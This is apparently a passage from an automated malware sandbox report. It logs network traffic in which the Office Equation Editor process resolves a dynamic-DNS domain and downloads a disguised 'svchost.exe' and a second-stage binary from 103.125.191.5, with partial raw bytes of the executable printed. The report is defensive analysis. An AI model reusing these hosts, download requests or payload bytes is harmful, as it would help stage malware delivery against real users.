                  Nov 19, 2020 07:44:37.331264019 CET4916680192.168.2.22103.125.191.5
                  Nov 19, 2020 07:44:37.331295967 CET8049166103.125.191.5192.168.2.22
                  Nov 19, 2020 07:44:37.331310034 CET4916680192.168.2.22103.125.191.5
                  Nov 19, 2020 07:44:37.331346035 CET8049166103.125.191.5192.168.2.22
                  Nov 19, 2020 07:44:37.331357002 CET4916680192.168.2.22103.125.191.5
                  Nov 19, 2020 07:44:37.331413984 CET4916680192.168.2.22103.125.191.5
                  Nov 19, 2020 07:44:37.331449032 CET8049166103.125.191.5192.168.2.22
                  Nov 19, 2020 07:44:37.331479073 CET8049166103.125.191.5192.168.2.22
                  Nov 19, 2020 07:44:37.331497908 CET4916680192.168.2.22103.125.191.5
                  Nov 19, 2020 07:44:37.331530094 CET4916680192.168.2.22103.125.191.5
                  Nov 19, 2020 07:44:37.331556082 CET8049166103.125.191.5192.168.2.22
                  Nov 19, 2020 07:44:37.331581116 CET8049166103.125.191.5192.168.2.22
                  Nov 19, 2020 07:44:37.331605911 CET4916680192.168.2.22103.125.191.5
                  Nov 19, 2020 07:44:37.331631899 CET4916680192.168.2.22103.125.191.5
                  Nov 19, 2020 07:44:37.331669092 CET8049166103.125.191.5192.168.2.22
                  Nov 19, 2020 07:44:37.331696987 CET8049166103.125.191.5192.168.2.22
                  Nov 19, 2020 07:44:37.331720114 CET4916680192.168.2.22103.125.191.5
                  Nov 19, 2020 07:44:37.331738949 CET8049166103.125.191.5192.168.2.22
                  Nov 19, 2020 07:44:37.331751108 CET4916680192.168.2.22103.125.191.5
                  Nov 19, 2020 07:44:37.331796885 CET4916680192.168.2.22103.125.191.5
                  Nov 19, 2020 07:44:37.331806898 CET8049166103.125.191.5192.168.2.22
                  Nov 19, 2020 07:44:37.331835032 CET8049166103.125.191.5192.168.2.22
                  Nov 19, 2020 07:44:37.331856012 CET4916680192.168.2.22103.125.191.5
                  Nov 19, 2020 07:44:37.331875086 CET8049166103.125.191.5192.168.2.22
                  Nov 19, 2020 07:44:37.331887007 CET4916680192.168.2.22103.125.191.5
                  Nov 19, 2020 07:44:37.331917048 CET8049166103.125.191.5192.168.2.22
                  Nov 19, 2020 07:44:37.331924915 CET4916680192.168.2.22103.125.191.5
                  Nov 19, 2020 07:44:37.331952095 CET8049166103.125.191.5192.168.2.22
                  Nov 19, 2020 07:44:37.331965923 CET4916680192.168.2.22103.125.191.5
                  Nov 19, 2020 07:44:37.331996918 CET8049166103.125.191.5192.168.2.22
                  Nov 19, 2020 07:44:37.332005024 CET4916680192.168.2.22103.125.191.5
                  Nov 19, 2020 07:44:37.332031965 CET8049166103.125.191.5192.168.2.22
                  Nov 19, 2020 07:44:37.332042933 CET4916680192.168.2.22103.125.191.5
                  Nov 19, 2020 07:44:37.332063913 CET4916680192.168.2.22103.125.191.5
                  Nov 19, 2020 07:44:37.332087994 CET8049166103.125.191.5192.168.2.22
                  Nov 19, 2020 07:44:37.332118034 CET8049166103.125.191.5192.168.2.22
                  Nov 19, 2020 07:44:37.332130909 CET4916680192.168.2.22103.125.191.5
                  Nov 19, 2020 07:44:37.332159042 CET8049166103.125.191.5192.168.2.22
                  Nov 19, 2020 07:44:37.332170010 CET4916680192.168.2.22103.125.191.5
                  Nov 19, 2020 07:44:37.332196951 CET8049166103.125.191.5192.168.2.22
                  Nov 19, 2020 07:44:37.332210064 CET4916680192.168.2.22103.125.191.5
                  Nov 19, 2020 07:44:37.332241058 CET4916680192.168.2.22103.125.191.5
                  Nov 19, 2020 07:44:37.332309961 CET4916680192.168.2.22103.125.191.5
                  Nov 19, 2020 07:44:37.655839920 CET8049166103.125.191.5192.168.2.22
                  Nov 19, 2020 07:44:37.655881882 CET8049166103.125.191.5192.168.2.22
                  Nov 19, 2020 07:44:37.655903101 CET8049166103.125.191.5192.168.2.22
                  Nov 19, 2020 07:44:37.655924082 CET8049166103.125.191.5192.168.2.22
                  Nov 19, 2020 07:44:37.655951977 CET8049166103.125.191.5192.168.2.22
                  Nov 19, 2020 07:44:37.655977964 CET8049166103.125.191.5192.168.2.22
                  Nov 19, 2020 07:44:37.656007051 CET8049166103.125.191.5192.168.2.22
                  Nov 19, 2020 07:44:37.656050920 CET4916680192.168.2.22103.125.191.5
                  Nov 19, 2020 07:44:37.656069040 CET4916680192.168.2.22103.125.191.5
                  Nov 19, 2020 07:44:37.656196117 CET8049166103.125.191.5192.168.2.22
                  Nov 19, 2020 07:44:37.656250000 CET4916680192.168.2.22103.125.191.5
                  Nov 19, 2020 07:44:37.656289101 CET8049166103.125.191.5192.168.2.22
                  Nov 19, 2020 07:44:37.656316996 CET8049166103.125.191.5192.168.2.22
                  Nov 19, 2020 07:44:37.656339884 CET4916680192.168.2.22103.125.191.5
                  Nov 19, 2020 07:44:37.656363964 CET4916680192.168.2.22103.125.191.5
                  Nov 19, 2020 07:44:37.656388998 CET8049166103.125.191.5192.168.2.22
                  Nov 19, 2020 07:44:37.656438112 CET8049166103.125.191.5192.168.2.22
                  Nov 19, 2020 07:44:37.656445980 CET4916680192.168.2.22103.125.191.5
                  Nov 19, 2020 07:44:37.656485081 CET4916680192.168.2.22103.125.191.5
                  Nov 19, 2020 07:44:37.656522036 CET4916680192.168.2.22103.125.191.5
                  Nov 19, 2020 07:44:37.656614065 CET8049166103.125.191.5192.168.2.22
                  Nov 19, 2020 07:44:37.656641960 CET8049166103.125.191.5192.168.2.22
                  Nov 19, 2020 07:44:37.656665087 CET4916680192.168.2.22103.125.191.5
                  Nov 19, 2020 07:44:37.656702042 CET4916680192.168.2.22103.125.191.5
                  Nov 19, 2020 07:44:37.656735897 CET8049166103.125.191.5192.168.2.22
                  Nov 19, 2020 07:44:37.656797886 CET4916680192.168.2.22103.125.191.5
                  Nov 19, 2020 07:44:37.980684042 CET8049166103.125.191.5192.168.2.22
                  Nov 19, 2020 07:44:37.980714083 CET8049166103.125.191.5192.168.2.22
                  Nov 19, 2020 07:44:37.980726004 CET8049166103.125.191.5192.168.2.22
                  Nov 19, 2020 07:44:37.980743885 CET8049166103.125.191.5192.168.2.22
                  Nov 19, 2020 07:44:37.980756998 CET8049166103.125.191.5192.168.2.22
                  Nov 19, 2020 07:44:37.980850935 CET8049166103.125.191.5192.168.2.22
                  Nov 19, 2020 07:44:37.980906963 CET8049166103.125.191.5192.168.2.22
                  Nov 19, 2020 07:44:37.980922937 CET4916680192.168.2.22103.125.191.5
                  Nov 19, 2020 07:44:37.980932951 CET4916680192.168.2.22103.125.191.5
                  Nov 19, 2020 07:44:37.980940104 CET4916680192.168.2.22103.125.191.5
                  Nov 19, 2020 07:44:37.980988979 CET4916680192.168.2.22103.125.191.5
                  Nov 19, 2020 07:44:37.980999947 CET4916680192.168.2.22103.125.191.5
                  Nov 19, 2020 07:44:37.981085062 CET8049166103.125.191.5192.168.2.22
                  Nov 19, 2020 07:44:37.981146097 CET4916680192.168.2.22103.125.191.5
                  Nov 19, 2020 07:44:37.981164932 CET8049166103.125.191.5192.168.2.22
                  Nov 19, 2020 07:44:37.981205940 CET8049166103.125.191.5192.168.2.22
                  Nov 19, 2020 07:44:37.981235027 CET4916680192.168.2.22103.125.191.5
                  Nov 19, 2020 07:44:37.981256962 CET8049166103.125.191.5192.168.2.22
                  Nov 19, 2020 07:44:37.981268883 CET4916680192.168.2.22103.125.191.5
                  Nov 19, 2020 07:44:37.981281996 CET8049166103.125.191.5192.168.2.22
                  Nov 19, 2020 07:44:37.981297016 CET8049166103.125.191.5192.168.2.22
                  Nov 19, 2020 07:44:37.981314898 CET4916680192.168.2.22103.125.191.5
                  Nov 19, 2020 07:44:37.981321096 CET8049166103.125.191.5192.168.2.22
                  Nov 19, 2020 07:44:37.981338978 CET8049166103.125.191.5192.168.2.22
                  Nov 19, 2020 07:44:37.981353998 CET4916680192.168.2.22103.125.191.5
                  Nov 19, 2020 07:44:37.981364012 CET8049166103.125.191.5192.168.2.22
                  Nov 19, 2020 07:44:37.981380939 CET8049166103.125.191.5192.168.2.22
                  Nov 19, 2020 07:44:37.981393099 CET4916680192.168.2.22103.125.191.5
                  Nov 19, 2020 07:44:37.981405020 CET8049166103.125.191.5192.168.2.22
                  Nov 19, 2020 07:44:37.981432915 CET4916680192.168.2.22103.125.191.5
                  Nov 19, 2020 07:44:37.981472015 CET4916680192.168.2.22103.125.191.5
                  Nov 19, 2020 07:44:37.981802940 CET4916680192.168.2.22103.125.191.5
                  Nov 19, 2020 07:44:38.305660963 CET8049166103.125.191.5192.168.2.22
                  Nov 19, 2020 07:44:38.305684090 CET8049166103.125.191.5192.168.2.22
                  Nov 19, 2020 07:44:38.305699110 CET8049166103.125.191.5192.168.2.22
                  Nov 19, 2020 07:44:38.305720091 CET8049166103.125.191.5192.168.2.22
                  Nov 19, 2020 07:44:38.305727005 CET4916680192.168.2.22103.125.191.5
                  Nov 19, 2020 07:44:38.305742025 CET4916680192.168.2.22103.125.191.5
                  Nov 19, 2020 07:44:38.305754900 CET8049166103.125.191.5192.168.2.22
                  Nov 19, 2020 07:44:38.305768967 CET4916680192.168.2.22103.125.191.5
                  Nov 19, 2020 07:44:38.305783987 CET8049166103.125.191.5192.168.2.22
                  Nov 19, 2020 07:44:38.305802107 CET8049166103.125.191.5192.168.2.22
                  Nov 19, 2020 07:44:38.305824995 CET8049166103.125.191.5192.168.2.22
                  Nov 19, 2020 07:44:38.305830956 CET4916680192.168.2.22103.125.191.5
                  Nov 19, 2020 07:44:38.305847883 CET4916680192.168.2.22103.125.191.5
                  Nov 19, 2020 07:44:38.305867910 CET4916680192.168.2.22103.125.191.5
                  Nov 19, 2020 07:44:38.305897951 CET8049166103.125.191.5192.168.2.22
                  Nov 19, 2020 07:44:38.305922031 CET8049166103.125.191.5192.168.2.22
                  Nov 19, 2020 07:44:38.305942059 CET8049166103.125.191.5192.168.2.22
                  Nov 19, 2020 07:44:38.305953026 CET4916680192.168.2.22103.125.191.5
                  Nov 19, 2020 07:44:38.305969000 CET8049166103.125.191.5192.168.2.22
                  Nov 19, 2020 07:44:38.305974960 CET4916680192.168.2.22103.125.191.5
                  Nov 19, 2020 07:44:38.305989981 CET8049166103.125.191.5192.168.2.22
                  Nov 19, 2020 07:44:38.306000948 CET8049166103.125.191.5192.168.2.22
                  Nov 19, 2020 07:44:38.306013107 CET8049166103.125.191.5192.168.2.22
                  Nov 19, 2020 07:44:38.306030989 CET8049166103.125.191.5192.168.2.22
                  Nov 19, 2020 07:44:38.306066990 CET4916680192.168.2.22103.125.191.5
                  Nov 19, 2020 07:44:38.306070089 CET4916680192.168.2.22103.125.191.5
                  Nov 19, 2020 07:44:38.306092024 CET4916680192.168.2.22103.125.191.5
                  Nov 19, 2020 07:44:38.306108952 CET8049166103.125.191.5192.168.2.22
                  Nov 19, 2020 07:44:38.306139946 CET8049166103.125.191.5192.168.2.22
                  Nov 19, 2020 07:44:38.306183100 CET4916680192.168.2.22103.125.191.5
                  Nov 19, 2020 07:44:38.306194067 CET4916680192.168.2.22103.125.191.5
                  Nov 19, 2020 07:44:38.306479931 CET4916680192.168.2.22103.125.191.5
                  Nov 19, 2020 07:44:38.630170107 CET8049166103.125.191.5192.168.2.22
                  Nov 19, 2020 07:44:38.630198956 CET8049166103.125.191.5192.168.2.22
                  Nov 19, 2020 07:44:38.630211115 CET8049166103.125.191.5192.168.2.22
                  Nov 19, 2020 07:44:38.630224943 CET8049166103.125.191.5192.168.2.22
                  Nov 19, 2020 07:44:38.630237103 CET8049166103.125.191.5192.168.2.22
                  Nov 19, 2020 07:44:38.630248070 CET8049166103.125.191.5192.168.2.22
                  Nov 19, 2020 07:44:38.630259991 CET8049166103.125.191.5192.168.2.22
                  Nov 19, 2020 07:44:38.630275965 CET8049166103.125.191.5192.168.2.22
                  Nov 19, 2020 07:44:38.630286932 CET8049166103.125.191.5192.168.2.22
                  Nov 19, 2020 07:44:38.630314112 CET8049166103.125.191.5192.168.2.22
                  Nov 19, 2020 07:44:38.630331993 CET8049166103.125.191.5192.168.2.22
                  Nov 19, 2020 07:44:38.630376101 CET4916680192.168.2.22103.125.191.5
                  Nov 19, 2020 07:44:38.630392075 CET4916680192.168.2.22103.125.191.5
                  Nov 19, 2020 07:44:38.630409956 CET8049166103.125.191.5192.168.2.22
                  Nov 19, 2020 07:44:38.630467892 CET4916680192.168.2.22103.125.191.5
                  Nov 19, 2020 07:44:38.630477905 CET8049166103.125.191.5192.168.2.22
                  Nov 19, 2020 07:44:38.630532026 CET4916680192.168.2.22103.125.191.5
                  Nov 19, 2020 07:44:38.630594015 CET8049166103.125.191.5192.168.2.22
                  Nov 19, 2020 07:44:38.630609989 CET8049166103.125.191.5192.168.2.22
                  Nov 19, 2020 07:44:38.630645037 CET4916680192.168.2.22103.125.191.5
                  Nov 19, 2020 07:44:38.630656958 CET4916680192.168.2.22103.125.191.5
                  Nov 19, 2020 07:44:38.630676031 CET8049166103.125.191.5192.168.2.22
                  Nov 19, 2020 07:44:38.630702972 CET4916680192.168.2.22103.125.191.5
                  Nov 19, 2020 07:44:38.630722046 CET4916680192.168.2.22103.125.191.5
                  Nov 19, 2020 07:44:38.630740881 CET8049166103.125.191.5192.168.2.22
                  Nov 19, 2020 07:44:38.630774021 CET8049166103.125.191.5192.168.2.22
                  Nov 19, 2020 07:44:38.630788088 CET4916680192.168.2.22103.125.191.5
                  Nov 19, 2020 07:44:38.630824089 CET4916680192.168.2.22103.125.191.5
                  Nov 19, 2020 07:44:38.630855083 CET8049166103.125.191.5192.168.2.22
                  Nov 19, 2020 07:44:38.630901098 CET4916680192.168.2.22103.125.191.5
                  Nov 19, 2020 07:44:38.954948902 CET8049166103.125.191.5192.168.2.22
                  Nov 19, 2020 07:44:38.955049038 CET8049166103.125.191.5192.168.2.22
                  Nov 19, 2020 07:44:38.955104113 CET8049166103.125.191.5192.168.2.22
                  Nov 19, 2020 07:44:38.955132008 CET4916680192.168.2.22103.125.191.5
                  Nov 19, 2020 07:44:38.955148935 CET4916680192.168.2.22103.125.191.5
                  Nov 19, 2020 07:44:38.955152988 CET4916680192.168.2.22103.125.191.5
                  Nov 19, 2020 07:44:38.955199957 CET8049166103.125.191.5192.168.2.22
                  Nov 19, 2020 07:44:38.955254078 CET8049166103.125.191.5192.168.2.22
                  Nov 19, 2020 07:44:38.955274105 CET4916680192.168.2.22103.125.191.5
                  Nov 19, 2020 07:44:38.955303907 CET4916680192.168.2.22103.125.191.5
                  Nov 19, 2020 07:44:38.955348969 CET8049166103.125.191.5192.168.2.22
                  Nov 19, 2020 07:44:38.955406904 CET8049166103.125.191.5192.168.2.22
                  Nov 19, 2020 07:44:38.955421925 CET4916680192.168.2.22103.125.191.5
                  Nov 19, 2020 07:44:38.955452919 CET4916680192.168.2.22103.125.191.5
                  Nov 19, 2020 07:44:38.955492020 CET8049166103.125.191.5192.168.2.22
                  Nov 19, 2020 07:44:38.955538034 CET4916680192.168.2.22103.125.191.5
                  Nov 19, 2020 07:44:38.955558062 CET8049166103.125.191.5192.168.2.22
                  Nov 19, 2020 07:44:38.955605030 CET4916680192.168.2.22103.125.191.5
                  Nov 19, 2020 07:44:38.955624104 CET8049166103.125.191.5192.168.2.22
                  Nov 19, 2020 07:44:38.955667973 CET4916680192.168.2.22103.125.191.5
                  Nov 19, 2020 07:44:38.955688953 CET8049166103.125.191.5192.168.2.22
                  Nov 19, 2020 07:44:38.955755949 CET8049166103.125.191.5192.168.2.22
                  Nov 19, 2020 07:44:38.955820084 CET4916680192.168.2.22103.125.191.5
                  Nov 19, 2020 07:44:38.955830097 CET4916680192.168.2.22103.125.191.5
                  Nov 19, 2020 07:44:38.955878973 CET8049166103.125.191.5192.168.2.22
                  Nov 19, 2020 07:44:38.955910921 CET8049166103.125.191.5192.168.2.22
                  Nov 19, 2020 07:44:38.955930948 CET4916680192.168.2.22103.125.191.5
                  Nov 19, 2020 07:44:38.955952883 CET4916680192.168.2.22103.125.191.5
                  Nov 19, 2020 07:44:41.871069908 CET8049166103.125.191.5192.168.2.22
                  Nov 19, 2020 07:44:41.871176958 CET4916680192.168.2.22103.125.191.5
                  Nov 19, 2020 07:44:55.907449961 CET4916680192.168.2.22103.125.191.5

                  UDP Packets

                  TimestampSource PortDest PortSource IPDest IP
                  Nov 19, 2020 07:43:18.152446032 CET5219753192.168.2.228.8.8.8
                  Nov 19, 2020 07:43:18.188976049 CET53521978.8.8.8192.168.2.22

                  DNS Queries

                  TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                  Nov 19, 2020 07:43:18.152446032 CET192.168.2.228.8.8.80xe410Standard query (0)wsdyworkfinesanotherrainbowlomoyentwsgha.ydns.euA (IP address)IN (0x0001)

                  DNS Answers

                  TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                  Nov 19, 2020 07:43:18.188976049 CET8.8.8.8192.168.2.220xe410No error (0)wsdyworkfinesanotherrainbowlomoyentwsgha.ydns.eu103.125.191.5A (IP address)IN (0x0001)

                  HTTP Request Dependency Graph

                  • wsdyworkfinesanotherrainbowlomoyentwsgha.ydns.eu
                  • 103.125.191.5

                  HTTP Packets

                  Session IDSource IPSource PortDestination IPDestination PortProcess
                  0192.168.2.2249165103.125.191.580C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                  TimestampkBytes transferredDirectionData
                  Nov 19, 2020 07:43:18.523520947 CET0OUTGET /worksdoc/svchost.exe HTTP/1.1
                  Accept: */*
                  Accept-Encoding: gzip, deflate
                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                  Host: wsdyworkfinesanotherrainbowlomoyentwsgha.ydns.eu
                  Connection: Keep-Alive
                  Nov 19, 2020 07:43:18.839695930 CET2INHTTP/1.1 200 OK
                  Date: Thu, 19 Nov 2020 06:43:17 GMT
                  Server: Apache/2.4.34 (Win32) OpenSSL/1.0.2o PHP/5.6.38
                  Last-Modified: Wed, 18 Nov 2020 21:48:32 GMT
                  ETag: "f000-5b4689298b6b3"
                  Accept-Ranges: bytes
                  Content-Length: 61440
                  Keep-Alive: timeout=5, max=100
                  Connection: Keep-Alive
                  Content-Type: application/x-msdownload
                  Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 d7 69 c6 c2 93 08 a8 91 93 08 a8 91 93 08 a8 91 10 14 a6 91 92 08 a8 91 dc 2a a1 91 9b 08 a8 91 a5 2e a5 91 92 08 a8 91 52 69 63 68 93 08 a8 91 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 8a a6 b8 50 00 00 00 00 00 00 00 00 e0 00 0f 01 0b 01 06 00 00 c0 00 00 00 30 00 00 00 00 00 00 18 12 00 00 00 10 00 00 00 d0 00 00 00 00 40 00 00 10 00 00 00 10 00 00 04 00 00 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 01 00 00 10 00 00 e9 b7 01 00 02 00 00 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 04 c3 00 00 3c 00 00 00 00 f0 00 00 f8 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 30 02 00 00 30 00 00 00 00 10 00 00 ac 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 60 b6 00 00 00 10 00 00 00 c0 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 bc 13 00 00 00 d0 00 00 00 10 00 00 00 d0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 f8 08 00 00 00 f0 00 00 00 10 00 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 ee 5b 23 58 18 00 00 00 c3 1f b0 49 23 00 00 00 00 00 00 00 00 00 00 00 55 53 45 52 33 32 2e 44 4c 4c 00 4d 53 56 42 56 4d 36 30 2e 44 4c 4c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                  Data Ascii: MZ@!L!This program cannot be run in DOS mode.$i*.RichPELP0@<00.text` `.data@.rsrc@@[#XI#USER32.DLLMSVBVM60.DLL
                  Nov 19, 2020 07:43:18.839757919 CET3INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                  Data Ascii:
                  Nov 19, 2020 07:43:18.839884996 CET4INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                  Data Ascii:
                  Nov 19, 2020 07:43:18.839926004 CET6INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                  Data Ascii:
                  Nov 19, 2020 07:43:19.155149937 CET7INData Raw: 00 72 75 6e 67 73 74 65 00 06 01 09 00 46 6f 6c 6b 65 6c 69 67 37 00 05 46 01 8e 02 72 04 ff 04 12 03 00 ff 03 2c 00 00 00 05 08 00 53 54 4f 52 41 4b 53 45 00 06 01 0a 00 62 6f 6c 69 67 73 6d 61 74 74 00 05 cf 03 80 08 4f 04 db 00 12 04 00 ff 03
                  Data Ascii: rungsteFolkelig7Fr,STORAKSEboligsmattO3Psychodida8Nglenavnsuffl1-NONSYNOPTCarandapr4{,BisttendegeSrsynet0/Kulsyresner
                  Nov 19, 2020 07:43:19.155210018 CET9INData Raw: 00 00 40 1f 40 00 30 d0 40 00 00 00 00 00 60 1d 76 00 00 00 00 00 00 00 00 00 00 00 00 00 fc 18 40 00 01 00 03 00 8c 1e 40 00 00 00 00 00 ff ff ff ff ff ff ff ff 00 00 00 00 70 1f 40 00 40 d0 40 00 00 00 00 00 a0 1c 76 00 00 00 00 00 00 00 00 00
                  Data Ascii: @@0@`v@@p@@@v4@@@P@vl@@@`@v@@ @p@ v
                  Nov 19, 2020 07:43:19.155246973 CET10INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                  Data Ascii: @@@@aV@?9`Bg@t @%@ #@ @` @
                  Nov 19, 2020 07:43:19.155287981 CET11INData Raw: 31 00 30 00 30 00 00 00 00 00 2e 00 00 00 6a 00 6d 00 53 00 63 00 4e 00 50 00 5a 00 43 00 41 00 41 00 77 00 4b 00 63 00 56 00 67 00 42 00 49 00 6f 00 32 00 58 00 31 00 30 00 30 00 00 00 34 00 00 00 6f 00 39 00 59 00 47 00 48 00 34 00 58 00 4e 00
                  Data Ascii: 100.jmScNPZCAAwKcVgBIo2X1004o9YGH4XNtHpCBImXjLZ2nNt991LeqKIW9fmNogmTZ4tlGfq9pLYrWa2MF69OEa121,MNMtjbRHx4PbamJpW
                  Nov 19, 2020 07:43:19.155329943 CET13INData Raw: 68 00 00 00 a4 21 40 00 07 00 03 00 00 00 00 00 00 00 00 00 d0 30 40 00 50 64 74 00 34 22 40 00 07 00 03 00 40 00 13 00 6c 00 00 00 a4 21 40 00 0b 00 03 00 00 00 00 00 00 00 00 00 34 31 40 00 50 64 74 00 40 22 40 00 0b 00 03 00 40 00 13 00 70 00
                  Data Ascii: h!@0@Pdt4"@@l!@41@Pdt@"@@p!@1@PdtP"@@t!@1@PdtX"@@x!@`2@Pdt`"@@|!@2@Pdth"@@
                  Nov 19, 2020 07:43:19.155369997 CET14INData Raw: 40 00 0a 12 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                  Data Ascii: @@l'@%@@@@'@%@@@@
                  Nov 19, 2020 07:43:19.155411005 CET16INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 74 29 40 00 fc 25 40 00 fe 11 40 00 04 12 40 00 0a 12 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                  Data Ascii: t)@%@@@@)@%@@@@)@%@@@@


                  Session IDSource IPSource PortDestination IPDestination PortProcess
                  1192.168.2.2249166103.125.191.580C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                  TimestampkBytes transferredDirectionData
                  Nov 19, 2020 07:44:36.030811071 CET66OUTGET /bin_xMjelaYnr43.bin HTTP/1.1
                  User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
                  Host: 103.125.191.5
                  Cache-Control: no-cache
                  Nov 19, 2020 07:44:36.356791973 CET67INHTTP/1.1 200 OK
                  Date: Thu, 19 Nov 2020 06:44:35 GMT
                  Server: Apache/2.4.34 (Win32) OpenSSL/1.0.2o PHP/5.6.38
                  Last-Modified: Wed, 18 Nov 2020 21:20:27 GMT
                  ETag: "2d640-5b4682e21b662"
                  Accept-Ranges: bytes
                  Content-Length: 185920
                  Content-Type: application/octet-stream
